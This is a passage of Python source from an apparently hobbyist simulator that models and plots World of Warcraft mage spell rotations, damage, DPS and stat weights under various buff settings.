'label': self.label = ' '.join(sp[1:]) if sp[0] == 'color': self.color = [0,0,0,1] self.color[0] = float(sp[1]) self.color[1] = float(sp[2]) self.color[2] = float(sp[3]) def parse_rot(rot): new_rot =[] l = len(rot) for i, spell in enumerate(rot): if spell == 'fireball': pos_ign = 0 if rot[(i+1)%l] == 'fireball': pos_ign +=1 if rot[(i+2)%l] == 'fireball': pos_ign +=1 elif rot[(i+2)%l] == 'scorch' and rot[(i+3)%l] == 'scorch': pos_ign +=1 elif rot[(i+1)%l] == 'scorch' and rot[(i+2)%l] == 'scorch': pos_ign +=1 if rot[(i+3)%l] == 'fireball': pos_ign +=1 elif rot[(i+3)%l] == 'scorch' and rot[(i+4)%l] == 'scorch': pos_ign +=1 if pos_ign == 2: new_rot.append('fireball_13_one_tick') elif pos_ign == 1: new_rot.append('fireball_13_one_tick_one_roll') elif pos_ign == 0: new_rot.append('fireball_13_one_tick_no_roll') elif spell == 'scorch': pos_ign = 0 if rot[(i+1)%l] == 'fireball': pos_ign +=1 if rot[(i+2)%l] == 'fireball': pos_ign +=1 elif rot[(i+2)%l] == 'scorch' and rot[(i+3)%l] == 'scorch': pos_ign +=1 elif rot[(i+1)%l] == 'scorch' and rot[(i+2)%l] == 'scorch': pos_ign +=1 if rot[(i+3)%l] == 'fireball': pos_ign +=1 elif rot[(i+3)%l] == 'scorch' and rot[(i+4)%l] == 'scorch': pos_ign +=1 if pos_ign == 2: new_rot.append('scorch_9') elif pos_ign == 1: new_rot.append('scorch_9_one_roll') elif pos_ign == 0: new_rot.append('scorch_9_no_roll') new_rot.append('scorch_9') elif spell == 'fireblast': new_rot.append('fireblast') elif spell == 'arcane_missiles': new_rot.append('arcane_missiles_10') elif spell == 'frostbolt': new_rot.append('frostbolt_13') elif spell == 'arcane_blast_0speed_0mana': new_rot.append('arcane_blast_1_0speed_0mana') elif spell == 'arcane_blast_1speed_1mana': new_rot.append('arcane_blast_1_1speed_1mana') elif spell == 'arcane_blast_2speed_2mana': new_rot.append('arcane_blast_1_2speed_2mana') elif spell == 'arcane_blast_3speed_3mana': new_rot.append('arcane_blast_1_3speed_3mana') elif spell == 'arcane_blast_1speed_0mana': new_rot.append('arcane_blast_1_1speed_0mana') elif spell == 'arcane_blast_2speed_0mana': new_rot.append('arcane_blast_1_2speed_0mana') elif spell == 'arcane_blast_3speed_0mana': new_rot.append('arcane_blast_1_3speed_0mana') else: print('spell '+ spell+ ' not found, possible spells are:') pos_spells = ['fireball_13_one_tick', 'fireball', 'scorch', 'fireblast', #'pyroblast', #'pom_pyroblast', 'arcane_missiles', 'arcane_blast_0speed_0mana', 'arcane_blast_1speed_1mana', 'arcane_blast_2speed_2mana', 'arcane_blast_3speed_3mana', 'arcane_blast_1speed_0mana', 'arcane_blast_2speed_0mana', 'arcane_blast_3speed_0mana', 'frostbolt', ] for spell in pos_spells: print(spell) return new_rot class moduleClass: filetypes=['mage'] def __init__ (self, fig, locations, frame, ui): self.fig=fig self.frame=frame self.locations=locations self.ui=ui def run(self): if self.ui['save_check']: try: import os os.makedirs(self.ui['save_filename']) except: None ui=self.ui fig=self.fig #prepare figure fig.clear() #load mages mage_colors = [[0.5,0,1,1], [1,0.5,0,1], [0.2,0.2,1,1], [0,0,0,1], [0.5,0,1,1], [1,1,0,1], [0.2,1,1,1], [0,1,0,1], ] self.mages=[] for i, location in enumerate(self.locations): self.mages.append(mage_file(location)) if self.mages[-1].save_rot[0] == 'arcane_frost_clearcasting_optimized': None elif self.mages[-1].save_rot[0] == 'fireball_spam_clearcasting_optimized': None elif self.mages[-1].save_rot[0] == 'frostbolt_spam_clearcasting_optimized': None elif self.mages[-1].save_rot[0] == 'scorch_spam_clearcasting_optimized': None else: self.mages[-1].save_rot = parse_rot(self.mages[-1].save_rot) if self.mages[-1].burn_rot[0] == 'None': None elif self.mages[-1].burn_rot[0] == 'AB_spam_clearcasting_optimized': None else: self.mages[-1].burn_rot = parse_rot(self.mages[-1].burn_rot) if not hasattr(self.mages[-1],'color'): self.mages[-1].color = mage_colors[i%8] for key in ['disable_arcane_power', 'disable_icy_veins', 'disable_cold_snap', 'disable_water_elemental', 'disable_combustion', 'disable_PoM_pyro', 'ignore_scorch_ramp']: self.mages[-1].talents[key] = ui[key] #load buffs buff_cases = [] for i in range(5): #merge coe and cos, as in patch 2.4(?) ui['buff_case_'+str(i)+'_curse_of_shadow'] = ui['buff_case_'+str(i)+'_curse_of_elements'] buff_cases.append({}) buff_case_str = 'buff_case_'+str(i)+'_' for key in ui: if buff_case_str in key: buff = key.split(buff_case_str)[1] try: buff_cases[i][buff] = int(ui[key]) except: buff_cases[i][buff] = ui[key] if buff_cases[i]['armor'] == 'mage armor': buff_cases[i]['mage_armor'] = 1 buff_cases[i]['molten_armor'] = 0 else: buff_cases[i]['mage_armor'] = 0 buff_cases[i]['molten_armor'] = 1 #buttons.append({'key': 'buff_case_'+str(k)+'armor', 'type': 'radio:text', 'texts': ['molten armor', 'mage armor']','default': '0', 'tab': 1, 'row': i}) #buttons.append({'key': 'buff_case_'+str(k)+'_molten_armor', 'type': 'check', 'text': 'molten armor','default': '1', 'tab': 1, 'row': i}) #buttons.append({'key': 'buff_case_'+str(k)+'_mage_armor', 'type': 'check', 'text': 'mage armor','default': '0', 'tab': 1, 'row': i}) #plot measurements linestyles=['-','-.','--',(0, (3, 1, 1, 1, 1, 1)),':'] self.frame.hidden_figure.set_dpi(300) self.frame.hidden_figure.set_size_inches(6,4) #self.frame.update() #self.frame.figure. canvas.draw() if ui['plot_dmg']: ax = fns.add_axis(self.fig,2) ax.grid() misc = [] for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in self.mages: misc = plot_dps(ui, mage, buff_case, i, linestyle, ax, misc, fractions = ui['include_rotation_fractions'], DMG = True) if ui['save_check']: misc = [] self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) tempax.grid() for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in self.mages: misc = plot_dps(ui, mage, buff_case, i, linestyle, tempax, misc, fractions = ui['include_rotation_fractions'], DMG = True) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/dmg.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/dmg.png') #self.frame.update() #self.frame.figure.canvas.draw() if ui['plot_dps']: ax = fns.add_axis(self.fig,2) ax.grid() misc = [] for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in self.mages: misc = plot_dps(ui, mage, buff_case, i, linestyle, ax, misc, fractions = ui['include_rotation_fractions'], DMG = False) if ui['save_check']: misc = [] self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) tempax.grid() for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in self.mages: misc = plot_dps(ui, mage, buff_case, i, linestyle, tempax, misc, fractions = ui['include_rotation_fractions'], DMG = False) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/dps.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/dps.png') #self.frame.update() #self.frame.figure.canvas.draw() if ui['plot_compare_buff_states']: num_buff_cases = 0 for i, buff_case in enumerate(buff_cases): if buff_case['check'] == 1: num_buff_cases+=1 if num_buff_cases>1: ax = fns.add_axis(self.fig,2) plot_compare_buff_states(ui, self.mages, buff_cases, linestyles, ax) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_compare_buff_states(ui, self.mages, buff_cases, linestyles, tempax) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_buff_states.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_buff_states.png') if ui['plot_compare_mages']: if hasattr(self.frame,'default_mage'): default_mage=mage_file(self.frame.default_mage) if default_mage.save_rot[0] == 'arcane_frost_clearcasting_optimized': None elif default_mage.save_rot[0] == 'fireball_spam_clearcasting_optimized': None elif default_mage.save_rot[0] == 'frostbolt_spam_clearcasting_optimized': None elif default_mage.save_rot[0] == 'scorch_spam_clearcasting_optimized': None else: default_mage.save_rot = parse_rot(default_mage.save_rot) if default_mage.burn_rot[0] == 'None': None elif default_mage.burn_rot[0] == 'AB_spam_clearcasting_optimized': None else: default_mage.burn_rot = parse_rot(default_mage.burn_rot) if not hasattr(default_mage,'color'): default_mage.color = mage_colors[i%8] for key in ['disable_arcane_power', 'disable_icy_veins', 'disable_cold_snap', 'disable_water_elemental', 'disable_combustion', 'disable_PoM_pyro', 'ignore_scorch_ramp']: default_mage.talents[key] = ui[key] ax = fns.add_axis(self.fig,2) plot_compare_mages(ui, default_mage, self.mages, buff_cases, linestyles, ax) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_compare_mages(ui, default_mage, self.mages, buff_cases, linestyles, tempax) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_mages.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_mages.png') if ui['plot_spell_dps']: ax = fns.add_axis(self.fig,2) plot_spell_dps(ui, self.mages, buff_cases, linestyles, ax) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_spell_dps(ui, self.mages, buff_cases, linestyles, tempax) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dps.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dps.png') #self.frame.figure.canvas.draw() if ui['plot_spell_dpm']: ax = fns.add_axis(self.fig,2) plot_spell_dps(ui, self.mages, buff_cases, linestyles, ax, DPM= True) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_spell_dps(ui, self.mages, buff_cases, linestyles, tempax, DPM= True) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dpm.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dpm.png') #self.frame.figure.canvas.draw() if ui['plot_stat_weights']: ax = fns.add_axis(self.fig,2) plot_stat_weights(ui, self.mages, buff_cases, linestyles, ax) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_stat_weights(ui, self.mages, buff_cases, linestyles, tempax) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/stat_weights.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/stat_weights.png') ''' ax.legend() #set x and ylabel ax.set_xlabel(ui['XYxlabel']) ax.set_xlim([ui['XYxmin'],ui['XYxmax']]) ax.set_ylabel(ui['XYylabel']) ''' if ui['save_check']: self.fig.savefig(ui['save_filename']+'/all.svg') self.fig.savefig(ui['save_filename']+'/all.png') fig.canvas.draw() self.frame.update() def addButtons(): buttons=[ {'key': 'mage_tab_0_name', 'type': 'tabname', 'text': 'misc', 'tab': 0} , {'key': 'mage_tab_1_name', 'type': 'tabname', 'text': 'buffs', 'tab': 1} , {'key': 'plot_dmg', 'type': 'check', 'text': 'plot_dmg','default': '1', 'tab': 0, 'row': 0}, {'key': 'plot_dps', 'type': 'check', 'text': 'plot_dps','default': '1', 'tab': 0, 'row': 0}, {'key': 'include_rotation_fractions', 'type': 'check', 'text': 'include rotation fractions','default': '0', 'tab': 0, 'row': 0}, {'key': 'plot_compare_buff_states', 'type': 'check', 'text': 'plot_compare_buff_states','default': '1', 'tab': 0, 'row': 0}, {'key': 'set_default_mage', 'type': 'click', 'text': 'set_default_mage','bind': set_default_mage, 'tab': 0, 'row': 0}, {'key': 'plot_compare_mages', 'type': 'check', 'text': 'plot_compare_mages','default': '1', 'tab': 0, 'row': 0}, #{'key': 'clear_default_mage', 'type': 'click', 'text': 'set_default_mage','bind': clear_default_mage, 'tab': 10, 'row': 0}, {'key': 'plot_spell_dps', 'type': 'check', 'text': 'plot_spell_dps','default': '0', 'tab': 0, 'row': 0}, {'key': 'plot_spell_dpm', 'type': 'check', 'text': 'plot_spell_dpm','default': '0', 'tab': 0, 'row': 0}, {'key': 'plot_stat_weights', 'type': 'check', 'text': 'plot_stat_weights','default': '0', 'tab': 0, 'row': 0}, {'key': 'time_min', 'type': 'txt:float', 'text': 'time_min', 'default': '40', 'width': 4, 'tab': 0, 'row': 1} , {'key': 'time_max', 'type': 'txt:float', 'text': 'time_max', 'default': '180', 'width': 4, 'tab': 0, 'row': 1} , {'key': 'dps_min', 'type': 'txt:float', 'text': 'dps_min', 'default': '0', 'width': 4, 'tab': 0, 'row': 2} , {'key': 'dps_max', 'type': 'txt:float', 'text': 'dps_max', 'default': '2000', 'width': 4, 'tab': 0, 'row': 2} , {'key': 'stat_weight_ymax', 'type': 'txt:int', 'text': 'stat_weight_ymax', 'default': '2', 'width': 4, 'tab': 0, 'row': 2} , {'key': 'disable_arcane_power', 'type': 'check', 'text': 'disable_arcane_power','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_icy_veins', 'type': 'check', 'text': 'disable_icy_veins','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_cold_snap', 'type': 'check', 'text': 'disable_cold_snap','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_water_elemental', 'type': 'check', 'text': 'disable_water_elemental','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_combustion', 'type': 'check', 'text': 'disable_combustion','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_PoM_pyro', 'type': 'check', 'text': 'disable_PoM_pyro','default': '0', 'tab': 0, 'row': 3}, {'key': 'ignore_scorch_ramp', 'type': 'check', 'text': 'ignore_scorch_ramp','default': '0', 'tab': 0, 'row': 3}, ] j = len(buttons) for k in range(5): i=k*2 buttons.append({'key': 'buff_case_'+str(k)+'_check', 'type': 'check', 'text': 'Buffs '+str(k),'default': '0', 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_label', 'type': 'txt', 'text': 'label:','default': 'buffs '+str(k), 'width': 10, 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_arcane_intellect', 'type': 'check', 'text': 'AI','default': '1', 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_armor', 'type': 'radio:text', 'texts': ['molten armor', 'mage armor'],'default': '0', 'tab': 1, 'row': i}) #buttons.append({'key': 'buff_case_'+str(k)+'_molten_armor', 'type': 'check', 'text': 'molten armor','default': '1', 'tab': 1, 'row': i}) #buttons.append({'key': 'buff_case_'+str(k)+'_mage_armor', 'type': 'check', 'text': 'mage armor','default': '0', 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_misc_add_mana', 'type': 'txt:float', 'text': '| misc mana (mana ruby, potions, etc)','default': '2400','width': 5, 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_innervate', 'type': 'txt:float', 'text': '# of innervates','default': '0','width': 2, 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_dummy_label', 'type': 'label', 'text': ' ', 'tab': 1, 'row': i+1}) #{'key': 'XYxlabel', 'type': 'txt', 'text': 'x label', 'default': r'$2\theta$', 'width': 10, 'tab': 0, 'row': 1} , #buttons.append({'key': 'buff_case_'+str(k)+'_curse_of_shadow', 'type': 'check', 'text': 'CoS','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_curse_of_elements', 'type': 'check', 'text': 'CoE','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_malediction', 'type': 'check', 'text': 'Malediction','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_divine_spirit', 'type': 'check', 'text': 'D.spirit','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_improved_divine_spirit', 'type': 'check', 'text': 'Imp.d.spirit','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_wrath_of_air_totem', 'type': 'check', 'text': 'WoA totem','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_improved_wrath_of_air_totem', 'type': 'check', 'text': 'imp.WoA','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_totem_of_wrath', 'type': 'check', 'text': 'totem of wrath','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_mark_of_the_wild', 'type': 'check', 'text': 'MotW','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_improved_mark_of_the_wild', 'type': 'check', 'text': 'imp.MotW','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_blessing_of_kings', 'type': 'check', 'text': 'BoK','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_blessing_of_wisdom', 'type': 'check', 'text': 'BoW','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_judgement_of_wisdom', 'type': 'check', 'text': 'JoW','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_shadow_priest_dps', 'type': 'txt:float', 'text': 'SP dps', 'default': '0', 'width': 4, 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_misery', 'type': 'check', 'text': 'misery','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_2_tier5_set_bonus', 'type': 'check', 'text': '2_tier5_set_bonus','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_spellfire_set', 'type': 'check', 'text': 'spellfire set','default': '0', 'tab': 1, 'row': i+1}) buttons[j]['default'] = 1 #{'key': 'XYxmin', 'type': 'txt:float', 'text': 'x min', 'default': '0', 'width': 4, 'tab': 0, 'row': 1} , #{'key': 'XYxmax', 'type': 'txt:float', 'text': 'x max', 'default': '120', 'width': 4, 'tab': 0, 'row': 1} , #{'key': 'XYxlabel', 'type': 'txt', 'text': 'x label', 'default': r'$2\theta$', 'width': 10, 'tab': 0, 'row': 1} , #{'key': 'XYnormalize', 'type': 'check', 'text': 'Normalize y-axis', 'tab': 0, 'row': 2} , #{'key': 'XYylabel_text', 'type': 'label', 'text': 'ylabel: ', 'tab': 0, 'row': 2} , #{'key': 'XYylabel', 'type': 'radio:text', 'texts': ['Counts', 'Intensity'], 'tab': 0, 'row': 2,'default': 0} , return buttons import copy def get_dmg(mage, buffs,times): new_stats_0 = copy.deepcopy(mage.stats) new_talents = copy.deepcopy(mage.talents) bck.buff_me(new_stats_0, new_talents, buffs) spells, new_stats = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) if mage.save_rot[0] == 'arcane_frost_clearcasting_optimized': save_rot = bck.get_dps_mps_rot_clearcasting_optimal(new_stats_0, new_talents, bck.game_config, spells_to_cast = 20000) elif mage.save_rot[0] == 'fireball_spam_clearcasting_optimized': new_talents['force_clearcasting'] = -1 spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 1 spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 0 # reset optimized_spells = [spells_no_c['fireball_13_one_tick']]*7 optimized_spells.append(spells_no_c['fireball_13_one_tick_one_roll']) optimized_spells.append(spells_no_c['fireball_13_three_tick_no_roll']) optimized_spells.append(spells_forced_c['arcane_missiles_10']) save_rot = bck.get_dps_mps_rotation(optimized_spells) elif mage.save_rot[0] == 'scorch_spam_clearcasting_optimized': new_talents['force_clearcasting'] = -1 spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 1 spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 0 # reset optimized_spells = [spells_no_c['scorch_9']]*7 optimized_spells.append(spells_no_c['scorch_9_no_roll']) optimized_spells.append(spells_no_c['scorch_9_no_roll']) optimized_spells.append(spells_forced_c['arcane_missiles_10']) save_rot = bck.get_dps_mps_rotation(optimized_spells) elif mage.save_rot[0] == 'frostbolt_spam_clearcasting_optimized': new_talents['force_clearcasting'] = -1 spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 1 spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 0 # reset optimized_spells = [spells_no_c['frostbolt_13']]*9 optimized_spells.append(spells_forced_c['arcane_missiles_10']) save_rot = bck.get_dps_mps_rotation(optimized_spells) else: save_rot = bck.get_dps_mps_rotation([spells[x] for x in mage.save_rot]) if mage.burn_rot[0] == 'None': burn_rot = [0,10**10] elif mage.burn_rot[0] == 'AB_spam_clearcasting_optimized': new_talents['force_clearcasting'] = -1 spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 1 spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 0 # reset optimized_spells = [spells_no_c['arcane_blast_1_3speed_3mana']]*9 optimized_spells.append(spells_forced_c['arcane_missiles_10']) burn_rot = bck.get_dps_mps_rotation(optimized_spells) else: burn_rot = bck.get_dps_mps_rotation([spells[x] for x in mage.burn_rot]) IV_replace = None if 'arcane_frost_clearcasting_optimized' in mage.save_rot or 'arcane_blast_1_3speed_0mana' in mage.save_rot: #print(mage.location) IV_replace = bck.get_dps_mps_rotation([spells[x] for x in ['frostbolt_13']]) dmg, dmg_burn, dmg_save, dmg_other, time_shift = bck.optimize_cycles_return_damage(new_stats,times,new_talents, burn_rot, save_rot, return_fractions=True, IV_replace=IV_replace ) return dmg, dmg_burn, dmg_save, dmg_other, time_shift def plot_dps(ui, mage, buffs, i, linestyle, ax, misc, fractions = False, DMG = False): times = np.arange(ui['time_min'],ui['time_max']+1, 1) dmg, dmg_burn, dmg_save, dmg_other, time_shift = get_dmg(mage, buffs, times) if DMG: times_mod = 1 ax.set_ylabel('Damage [DMG]') #ax.set_ylim([u,ui['dps_max']]) else: times_mod = times ax.set_ylabel('Average dps [DMG/s]') ax.set_ylim([ui['dps_min'],ui['dps_max']]) if fractions: if not 'dmg_frac_label' in misc: misc.append('dmg_frac_label') ax.fill_between(times, np.zeros(len(times)), dmg_save/times_mod, color=[0.5,0,1,0.2], label = 'save') ax.fill_between(times, dmg_save/times_mod, dmg_save/times_mod+dmg_burn/times_mod, color=[1,0,0.5,0.2], label = 'burn') else: ax.fill_between(times, np.zeros(len(times)), dmg_save/times_mod, color=[0.5,0,1,0.2]) ax.fill_between(times, dmg_save/times_mod, dmg_save/times_mod+dmg_burn/times_mod, color=[1,0,0.5,0.2]) if np.sum(dmg_other)>1000: if not 'dmg_frac_other_label' in misc: misc.append('dmg_frac_other_label') ax.fill_between(times, dmg_save/times_mod+dmg_burn/times_mod, dmg_save/times_mod+dmg_burn/times_mod+dmg_other/times_mod, color=[0,0,0,0.2], label = 'other (pom+pyro, etc)') else: ax.fill_between(times, dmg_save/times_mod+dmg_burn/times_mod, dmg_save/times_mod+dmg_burn/times_mod+dmg_other/times_mod, color=[0,0,0,0.2]) ax.plot(times, dmg/times_mod, linestyle= linestyle, color=mage.color, label = mage.label+', '+ui['buff_case_'+str(i)+'_label']) ax.set_xticks(ticks=np.arange((int((times[0]-1)/30)+1)*30,times[-1]+1,30)) ax.set_xlabel('Total casting time before boss dead [s]') '''ax.annotate('Evocation', xy=(43, 1100), xytext=(48, 1400), arrowprops=dict(facecolor='black', shrink=0.05), horizontalalignment='left', verticalalignment='top', ) ax.annotate('OOM', xy=(110, 800), xytext=(120,1100), arrowprops=dict(facecolor='black', shrink=0.05), horizontalalignment='left', verticalalignment='top', )''' ax.legend() ax.set_xlim([ui['time_min'],ui['time_max']]) ylim = ax.get_ylim() if ylim[0]<0: ax.set_ylim([0,ylim[1]]) #fig.savefig('optimized_spam.png') return misc def plot_spell_dps(ui, mages, buff_cases, linestyles, ax, DPM = False): #ax.grid() spell_names = ['frostbolt_13','fireball_13_one_tick', 'scorch_9', 'arcane_blast_1_0speed_0mana', 'arcane_blast_1_1speed_1mana', 'arcane_blast_1_2speed_2mana', 'arcane_blast_1_3speed_3mana', 'arcane_blast_1_3speed_0mana', 'arcane_missiles_10', ] x = np.arange(len(spell_names)) tot_cases = 0 for i, buff_case in enumerate(buff_cases): if buff_case['check'] == 1: tot_cases+=len(mages) j=0 width = 0.8/(tot_cases) for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in mages: new_stats_0 = copy.deepcopy(mage.stats) new_talents = copy.deepcopy(mage.talents) bck.buff_me(new_stats_0, new_talents, buff_case) spells, new_stats = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) dpms = [] dpss = [] for spell_name in spell_names: dps = spells[spell_name].average_damage / spells[spell_name].actual_cast_time dpss.append(dps) dpm = spells[spell_name].average_damage / spells[spell_name].actual_mana dpms.append(dpm) offset = -0.8/2+(j+0.5)*0.8/(tot_cases) color = [mage.color[0], mage.color[1], mage.color[2],0.5] edgecolor = [mage.color[0], mage.color[1], mage.color[2],1] if not DPM: rects = ax.bar(x +offset, dpss, width, linestyle=linestyle, edgecolor= edgecolor, color=color, label=mage.label) else: rects = ax.bar(x +offset, dpms, width, linestyle=linestyle, edgecolor= edgecolor, color=color, label=mage.label) #rects = ax[1].bar(x +offset, dpms, width, color=mage.color, label=mage.label) j+=1 if not DPM: ax.set_ylabel('spell dps') else: ax.set_ylabel('spell dpm') #ax.set_ylabel('spell dpm') spell_names_short = ['Frostbolt', 'Fireball', 'Scorch', 'AB0', 'AB1', 'AB2', 'AB3', 'AB3\ncost1', 'AM', ] ax.set_xticks(np.arange(0,len(spell_names_short),1)) ax.set_xticklabels(spell_names_short) #ax[1].legend() #fig.tight_layout() return def plot_stat_weights(ui, mages, buff_cases, linestyles, ax, DPM = False): stats_list = ['intellect','common_spell_damage', 'crit_rating','hit_rating','haste_rating','mp5','spirit'] stats_names = ['Intellect','+Spelldamage','Crit rating', 'Hit rating','Haste','mp5','Spirit'] x_step = ui['time_max']-ui['time_min'] xlim = [ui['time_min'],ui['time_max']+3*x_step] times = np.arange(ui['time_min'],ui['time_max']+1, 1) max_ylim = ui['stat_weight_ymax'] for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in mages: tmp = get_dmg(mage, buff_case, times) dps_0 = tmp[0]/times xo=-x_step yo=max_ylim for i, stat in enumerate(stats_list): if i==4: xo=0 yo-=max_ylim else: xo+=x_step mage.stats[stat]-=10 #print('arcane') out = get_dmg(mage, buff_case, times) dps_new = out[0]/times mage.stats[stat]+=10 fraction_increase_per_stat = -0.1*(dps_new/dps_0-1) #stat_per_percent_fire[stat_per_percent_fire<0]=np.nan #stat_per_percent_fire[stat_per_percent_fire>max_ylim]=np.nan stat_per_percent = 0.01/fraction_increase_per_stat y= 20/stat_per_percent y[y<-0.0001] = np.nan y[y>max_ylim] = np.nan ax.plot(times+xo,y+yo,linestyle= linestyle,color=mage.color) xo=-x_step yo=max_ylim for i, stat in enumerate(stats_list): if i==4: xo=0 yo-=max_ylim else: xo+=x_step ax.text(xo+xlim[0]+0.05*x_step, yo+max_ylim-0.05*max_ylim, stats_names[i],ha='left', va='top') ax.set_xlim(xlim) ax.set_ylim([0,2*max_ylim]) ax.set_xticks([]) ax.set_yticks(np.arange(max_ylim*4)/2) ax.set_yticklabels(np.arange(max_ylim*4)/2%max_ylim) ax.plot(xlim, [max_ylim,max_ylim], lw=0.5,color=[0,0,0,1]) ax.grid() for i in range(1,4): ax.plot([xlim[0]+x_step*i]*2, [0,max_ylim*2], lw=0.5,color=[0,0,0,1]) x_ticks_0 = np.arange((int((times[0]-1)/30)+1)*30,times[-1],30) x_ticks = [] for i in range(4): for x in x_ticks_0: x_ticks.append(x+i*x_step) ax.set_xticks(ticks=x_ticks) x_ticks = [] for i in range(4): for x in x_ticks_0: x_ticks.append(int(x)) ax.set_xticklabels(x_ticks) ax.set_xlabel('Total casting time before boss dead [s]') ax.set_ylabel('Stat weight [-]') '''axes[i].set_title(stats_names[i]) axes[i].set_ylim([0,max_ylim]) axes[i].set_yticks([0,1,2,3,4,5]) axes[i].grid() axes[i].set_xlim([20,180])''' #axes[-1].set_axis_off() #fig.suptitle('Stat weights') #fig.tight_layout() def plot_compare_buff_states(ui, mages, buff_cases, linestyles, ax): xlim = [ui['time_min'],ui['time_max']] times = np.arange(ui['time_min'],ui['time_max']+1, 1) max_ylim = ui['stat_weight_ymax'] ax.plot(times, np.zeros(times.shape), color=[0,0,0,1]) for mage in mages: done_first = 0 for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: if done_first ==0: tmp = get_dmg(mage, buff_case, times) dps_0 = tmp[0]/times done_first = 1 label_0 = ui['buff_case_'+str(i)+'_label'] else: tmp = get_dmg(mage, buff_case, times) dps_1 = tmp[0]/times ax.plot(times, 100*(dps_1/dps_0-1), linestyle= linestyle, color=mage.color, label = mage.label+', '+ui['buff_case_'+str(i)+'_label']) 